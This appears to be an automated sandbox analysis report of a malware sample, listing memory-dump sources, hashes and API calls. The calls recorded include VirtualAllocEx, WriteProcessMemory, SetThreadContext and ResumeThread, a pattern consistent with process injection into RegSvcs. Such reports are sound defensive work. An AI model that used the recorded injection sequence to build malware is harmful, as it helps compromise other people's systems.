                                                                        • Source File: 00000009.00000002.1506391085.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_6c80000_VWGccZGgix.jbxd
                                                                        Similarity
                                                                        • API ID: DrawText
                                                                        • String ID:
                                                                        • API String ID: 2175133113-0
                                                                        • Opcode ID: f3f896390d62a6f2362b32faf3ac11ddc50b81472ef7c9ea8708d0b4c2c64c30
                                                                        • Instruction ID: 78274b0183f0309b23f27fc36964fb1c1698e6f3d02f98f566149fbcc205a9e8
                                                                        • Opcode Fuzzy Hash: f3f896390d62a6f2362b32faf3ac11ddc50b81472ef7c9ea8708d0b4c2c64c30
                                                                        • Instruction Fuzzy Hash: 793122B5D002499FDB10CFAAD884ADEFBF5EF48320F14842AE819A7210D7749904CFA0

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,06C838ED,?,?), ref: 06C8399F
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.1506391085.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_6c80000_VWGccZGgix.jbxd
                                                                        Similarity
                                                                        • API ID: DrawText
                                                                        • String ID:
                                                                        • API String ID: 2175133113-0

                                                                        Control-flow Graph
                                                                        [Figure: control-flow graph of the function, with blocks marked Executed / Not Executed; the graph passes through a call to WriteProcessMemory.]
                                                                        APIs
                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06F279D0
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.1507000276.0000000006F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F20000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_6f20000_VWGccZGgix.jbxd
                                                                        Similarity
                                                                        • API ID: MemoryProcessWrite
                                                                        • String ID:
                                                                        • API String ID: 3559483778-0
                                                                        APIs
                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06F273EE
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.1507000276.0000000006F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F20000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_6f20000_VWGccZGgix.jbxd
                                                                        Similarity
                                                                        • API ID: ContextThreadWow64
                                                                        • String ID:
                                                                        • API String ID: 983334009-0
                                                                        APIs
                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0086D54F
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.1496995206.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_860000_VWGccZGgix.jbxd
                                                                        Similarity
                                                                        • API ID: DuplicateHandle
                                                                        • String ID:
                                                                        • API String ID: 3793708945-0
                                                                        APIs
                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06F27AB0
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.1507000276.0000000006F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F20000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_6f20000_VWGccZGgix.jbxd
                                                                        Similarity
                                                                        • API ID: MemoryProcessRead
                                                                        • String ID:
                                                                        • API String ID: 1726664587-0
                                                                        APIs
                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06F27AB0
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.1507000276.0000000006F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F20000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_6f20000_VWGccZGgix.jbxd
                                                                        Similarity
                                                                        • API ID: MemoryProcessRead
                                                                        • String ID:
                                                                        • API String ID: 1726664587-0
                                                                        APIs
                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06F273EE
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.1507000276.0000000006F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F20000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_6f20000_VWGccZGgix.jbxd
                                                                        Similarity
                                                                        • API ID: ContextThreadWow64
                                                                        • String ID:
                                                                        • API String ID: 983334009-0
                                                                        APIs
                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0086D54F
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.1496995206.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_860000_VWGccZGgix.jbxd
                                                                        Similarity
                                                                        • API ID: DuplicateHandle
                                                                        • String ID:
                                                                        • API String ID: 3793708945-0
                                                                        APIs
                                                                        • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,04BA37CA,?,?,?,?,?), ref: 04BA386F
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.1505472063.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_4ba0000_VWGccZGgix.jbxd
                                                                        Similarity
                                                                        • API ID: CreateFromIconResource
                                                                        • String ID:
                                                                        • API String ID: 3668623891-0
                                                                        APIs
                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06F278EE
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.1507000276.0000000006F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F20000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_6f20000_VWGccZGgix.jbxd
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID:
                                                                        • API String ID: 4275171209-0
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.1507000276.0000000006F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F20000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_6f20000_VWGccZGgix.jbxd
                                                                        Similarity
                                                                        • API ID: ResumeThread
                                                                        • String ID:
                                                                        • API String ID: 947044025-0
                                                                        APIs
                                                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 06F2B3AD
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.1507000276.0000000006F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F20000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_6f20000_VWGccZGgix.jbxd
                                                                        Similarity
                                                                        • API ID: MessagePost
                                                                        • String ID:
                                                                        • API String ID: 410705778-0
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.1507000276.0000000006F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F20000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_6f20000_VWGccZGgix.jbxd
                                                                        Similarity
                                                                        • API ID: ResumeThread
                                                                        • String ID:
                                                                        • API String ID: 947044025-0
                                                                        APIs
                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0086B246
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.1496995206.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_860000_VWGccZGgix.jbxd
                                                                        Similarity
                                                                        • API ID: HandleModule
                                                                        • String ID:
                                                                        • API String ID: 4139908857-0
                                                                        APIs
                                                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 06F2B3AD
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.1507000276.0000000006F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F20000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_6f20000_VWGccZGgix.jbxd
                                                                        Similarity
                                                                        • API ID: MessagePost
                                                                        • String ID:
                                                                        • API String ID: 410705778-0
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.1496623720.000000000080D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0080D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_80d000_VWGccZGgix.jbxd
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.1496682784.000000000081D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0081D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_81d000_VWGccZGgix.jbxd
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.1496623720.000000000080D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0080D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_80d000_VWGccZGgix.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0d1964494f132f00775c0e221f472ab769a33717f3edcd57285c8181465a4d2f
                                                                        • Instruction ID: c43deca9178e1587a7fb82fbbc41c5289770c6ede80531ffa195540c23ef5aa9
                                                                        • Opcode Fuzzy Hash: 0d1964494f132f00775c0e221f472ab769a33717f3edcd57285c8181465a4d2f
                                                                        • Instruction Fuzzy Hash: 2711E172504280DFCB01CF50D9C0B16BF71FB88318F24C6A9DC094B696C336D85ACBA2
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.1496682784.000000000081D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0081D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_81d000_VWGccZGgix.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a6f14a2633b0976cf55fba98dc8f49a251bcab79b87bdac7509de7911a20ab2c
                                                                        • Instruction ID: a6fc9f3d086e24ec356aa9cb38910978b1c773f11b9f62a9222623e9a7aa8b5c
                                                                        • Opcode Fuzzy Hash: a6f14a2633b0976cf55fba98dc8f49a251bcab79b87bdac7509de7911a20ab2c
                                                                        • Instruction Fuzzy Hash: 0B118B75504780DFCB15CF14D5C4B56FBA2FB88314F24C6AAD8498B656C33AD88ACBA2
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.1496682784.000000000081D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0081D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_81d000_VWGccZGgix.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a6f14a2633b0976cf55fba98dc8f49a251bcab79b87bdac7509de7911a20ab2c
                                                                        • Instruction ID: e555e7b98f1c3c97c71d69cb9b4875800fd5d97226d1c030e16bff0835e6a4d0
                                                                        • Opcode Fuzzy Hash: a6f14a2633b0976cf55fba98dc8f49a251bcab79b87bdac7509de7911a20ab2c
                                                                        • Instruction Fuzzy Hash: 6D11BB75504280DFCB01CF14D5C4B15BFA1FB84314F24C6AAD8498B656C33AE88ACB62

                                                                        Execution Graph

                                                                        Execution Coverage:8.3%
                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                        Signature Coverage:0%
                                                                        Total number of Nodes:16
                                                                        Total number of Limit Nodes:0
                                                                        execution_graph 26059 2c20871 26063 2c208c8 26059->26063 26068 2c208d8 26059->26068 26060 2c20889 26064 2c208d8 26063->26064 26073 2c20ce3 26064->26073 26077 2c20ce8 26064->26077 26065 2c2093e 26065->26060 26069 2c208fa 26068->26069 26071 2c20ce3 GetConsoleWindow 26069->26071 26072 2c20ce8 GetConsoleWindow 26069->26072 26070 2c2093e 26070->26060 26071->26070 26072->26070 26074 2c20ce8 GetConsoleWindow 26073->26074 26076 2c20d56 26074->26076 26076->26065 26078 2c20d26 GetConsoleWindow 26077->26078 26080 2c20d56 26078->26080 26080->26065

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.1666702910.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_6df0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @
                                                                        • API String ID: 0-2766056989

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 949 2c20ce3-2c20d54 GetConsoleWindow 953 2c20d56-2c20d5c 949->953 954 2c20d5d-2c20d82 949->954 953->954
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.1629356994.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_2c20000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID: ConsoleWindow
                                                                        • String ID:
                                                                        • API String ID: 2863861424-0

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 958 2c20ce8-2c20d54 GetConsoleWindow 961 2c20d56-2c20d5c 958->961 962 2c20d5d-2c20d82 958->962 961->962
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.1629356994.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_2c20000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID: ConsoleWindow
                                                                        • String ID:
                                                                        • API String ID: 2863861424-0

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.1658519915.00000000063E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_63e0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9fed840571d621f54ca64ad76e1a3e0ae32189f449e6f59d9787d093cab67283
                                                                        • Instruction ID: 49deb412dc23453c47d0e63822b6df8b841223ebe3fcaaf6657a653ca36c1260
                                                                        • Opcode Fuzzy Hash: 9fed840571d621f54ca64ad76e1a3e0ae32189f449e6f59d9787d093cab67283
                                                                        • Instruction Fuzzy Hash: 3CC24F35B006189FCB14DB68C890BAEB7B6FF88704F114095E605AB3A1DB71EE85DF91

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.1666702910.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_6df0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @
                                                                        • API String ID: 0-2766056989

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.1658519915.00000000063E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_63e0000_RegSvcs.jbxd

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.1658519915.00000000063E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_63e0000_RegSvcs.jbxd

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.1666702910.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_6df0000_RegSvcs.jbxd

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.1666702910.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_6df0000_RegSvcs.jbxd

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.1658519915.00000000063E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_63e0000_RegSvcs.jbxd
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.1666702910.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_6df0000_RegSvcs.jbxd
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.1658519915.00000000063E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_63e0000_RegSvcs.jbxd
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.1658519915.00000000063E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_63e0000_RegSvcs.jbxd
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.1666702910.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_6df0000_RegSvcs.jbxd
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.1666702910.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_6df0000_RegSvcs.jbxd
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.1666702910.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_6df0000_RegSvcs.jbxd
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.1666702910.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_6df0000_RegSvcs.jbxd
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.1625512076.0000000000FDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FDD000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_fdd000_RegSvcs.jbxd
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.1625604134.0000000000FED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FED000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_fed000_RegSvcs.jbxd
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.1625604134.0000000000FED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FED000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_fed000_RegSvcs.jbxd
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.1666702910.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_6df0000_RegSvcs.jbxd
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.1666702910.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_6df0000_RegSvcs.jbxd
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.1625512076.0000000000FDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FDD000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_fdd000_RegSvcs.jbxd
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.1666702910.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_6df0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c53e16a257a50acefb026cc3c05904896c1e312a0f87a227066fedaa7db56f7e
                                                                        • Instruction ID: d8e2ba0e9c837a4a52da8e89f92ac316b0bcd3468f4f4c6b8dd233c4a8396a2e
                                                                        • Opcode Fuzzy Hash: c53e16a257a50acefb026cc3c05904896c1e312a0f87a227066fedaa7db56f7e
                                                                        • Instruction Fuzzy Hash: 7C118235710214EFD7548F65DC44BAB7BA6EB84310F208469FA458B381C771ED11C7A0
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.1658519915.00000000063E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_63e0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b9e2f029be5368a2fcaadb3c6ad3a5a51ad292c19dbe9aad08f7e5fa6791066e
                                                                        • Instruction ID: aac1ba5c1ba3cd2a6381b5d8fa8d0222f9703fda03a6f6d4f22ae4f8aed322d7
                                                                        • Opcode Fuzzy Hash: b9e2f029be5368a2fcaadb3c6ad3a5a51ad292c19dbe9aad08f7e5fa6791066e
                                                                        • Instruction Fuzzy Hash: D60128777002218BD7949A6ED8106B6F7EACBC5266718807FDA06C7380DE71D842CBF1
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.1666702910.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_6df0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: fb0291ca47715008899e20f287f3e7075ff447dde5d6785e3267034e54730094
                                                                        • Instruction ID: e24c509a0140e56678eef4e866ee1f227bfe4a07986f45782916e314c1d83db1
                                                                        • Opcode Fuzzy Hash: fb0291ca47715008899e20f287f3e7075ff447dde5d6785e3267034e54730094
                                                                        • Instruction Fuzzy Hash: 6E210474A10209DFDB45DFA8D584ADDBBF2AF49300F25C599E804BB260D731AE85CB90
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.1666702910.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_6df0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1c9587d8d4d6fd6baca30f66a6d1cacb74fd26752e96c0a232af47c1b79f6ade
                                                                        • Instruction ID: 3ea4c5a2a0961b5d31888053a549db5122f20050ade5481a532183be3570bba6
                                                                        • Opcode Fuzzy Hash: 1c9587d8d4d6fd6baca30f66a6d1cacb74fd26752e96c0a232af47c1b79f6ade
                                                                        • Instruction Fuzzy Hash: 1311A531A111499BDB68CF68DD146EDBBF29FC8201F15417DD846F3A55CB328E46CB90
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.1625604134.0000000000FED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FED000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_fed000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0087aa9c0370ffbcc44a91c72dac69a08dec4055da452c00f01411939cf63ad0
                                                                        • Instruction ID: 91d496c317e9129c7d4ffe3104f0fd7546555928dc4d60d951453d40eea1d738
                                                                        • Opcode Fuzzy Hash: 0087aa9c0370ffbcc44a91c72dac69a08dec4055da452c00f01411939cf63ad0
                                                                        • Instruction Fuzzy Hash: 7611B275904684DFDB11CF10D5C4B19FF61FB84324F24C6AAD8494BA56C33AD846CBA2
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.1625604134.0000000000FED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FED000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_fed000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a6f14a2633b0976cf55fba98dc8f49a251bcab79b87bdac7509de7911a20ab2c
                                                                        • Instruction ID: ec625426929550d576677a108553fcb0ebb14dd59fafeccc7c7e8dd2f0804907
                                                                        • Opcode Fuzzy Hash: a6f14a2633b0976cf55fba98dc8f49a251bcab79b87bdac7509de7911a20ab2c
                                                                        • Instruction Fuzzy Hash: A4118E75904680DFCB05CF10D9C4B15BB71FB84328F28C6AAD8494B656C33AD84ADB52
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.1666702910.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_6df0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 46df3c7f99304a7f2deb1ba361a6f1f108e3ddb5ba3fb4898314bcd0d93f3256
                                                                        • Instruction ID: 77ab6ed08f1f071852ce5fcf9342ed19e67de2de5ed1632e8880faed3618a40b
                                                                        • Opcode Fuzzy Hash: 46df3c7f99304a7f2deb1ba361a6f1f108e3ddb5ba3fb4898314bcd0d93f3256
                                                                        • Instruction Fuzzy Hash: 45012B11A0E3B45FD3426F7C6C642EF3FB59E87510309409BD106CF396DA18894A83D7
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.1666702910.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_6df0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0fc5d4ca79bd62ee130b42ac55b3653a8f4f676b055fd722fe756279311118de
                                                                        • Instruction ID: ef5cfce07f0687b6e4fa767c5f56682faafa9418248590c32c376c3d58f2ef84
                                                                        • Opcode Fuzzy Hash: 0fc5d4ca79bd62ee130b42ac55b3653a8f4f676b055fd722fe756279311118de
                                                                        • Instruction Fuzzy Hash: DD1170356002059FCB04DF68D884D9EBBB6FF89324B148169E9198F362DB72ED02CB91
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.1666702910.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_6df0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e205402fa71a5795bdc4534512cc64d6a420518589b751e3611f0d017150a377
                                                                        • Instruction ID: 20bafc818aec43f155ba2902dcb831067e4ebcaf7e3c96e326107105e07ec4a9
                                                                        • Opcode Fuzzy Hash: e205402fa71a5795bdc4534512cc64d6a420518589b751e3611f0d017150a377
                                                                        • Instruction Fuzzy Hash: B211F531A28398DFCB01CF28D8546AABFB2BF89310F0540AAED44D7381D7B09C54C7A1
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.1625512076.0000000000FDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FDD000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_fdd000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0d2744a437ebf8b8303fb7480232bcbcb670cd2e3d191a1fceb0333b46df6783
